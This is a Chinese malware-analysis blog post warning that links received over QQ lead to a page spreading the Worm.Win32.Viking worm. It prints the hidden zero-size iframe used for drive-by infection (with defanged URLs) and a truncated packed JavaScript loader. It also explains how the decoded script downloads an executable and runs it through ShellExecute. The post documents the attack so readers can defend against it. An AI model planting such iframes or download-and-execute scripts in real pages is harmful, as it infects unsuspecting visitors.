小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg

简介: 小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg

QQ收到信息:

/---
---/
hxxp://www.b**b**a*imm.info 主页包含代码:
/---
<iframe src=hxxp://www.9*7***72***5.com/do**e1****2.htm width=0 height=0></iframe>
---/
hxxp://www.9*7***72***5.com/do**e1****2.htm 包含代码:
/---
<script src=css.js></script>
---/
css.js 的内容为 JavaScript代码:
/---
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p;}('Z("//j//w……(略)……|110|114'.split('|'),0,{}))
---/

解密后的内容为一段 JavaScript脚本,主要功能是运行自定义函数 gn(n),利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 97725.exe,保存为 %windir%/~tmp.tmp,并利用Shell.Application 对象 Q 的 ShellExecute 方法执行命令:%windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。

加密方法与昨天发现的

一个传播 Worm.Win32.Viking.jg的 网页,解密有点难度

相同,就是下载的文件不同。


目录
打赏
0
2
2
1
57
分享
相关文章
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码

热门文章

最新文章

AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等